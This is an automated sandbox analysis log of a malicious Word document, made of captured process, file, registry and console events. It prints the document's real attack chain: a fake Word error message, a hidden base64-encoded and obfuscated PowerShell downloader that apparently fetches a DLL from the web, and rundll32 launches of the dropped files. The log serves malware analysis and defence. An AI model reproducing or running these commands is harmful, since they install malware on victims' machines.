Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j.....H~.............................}..v.....Z......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............&..j.....[..............................}..v....(\......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....b......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....c..............................}..v....(d......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....j......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....k..............................}..v....(l......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....r......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....s..............................}..v....(t......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....z......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....{..............................}..v....(\|......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v.... .......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j.....H~.............................}..v....P.......0.r.....................r.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;....... ..........j.....H~.............................}..v............0.r.............XE~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;...............&..j....................................}..v....P.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E...............................}..v......5.....0.r...............~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E...............................}..v....0.5.....0.r...............~.............................	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1

Source: Doc.doc	Virustotal: Detection: 69%
Source: Doc.doc	ReversingLabs: Detection: 82%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
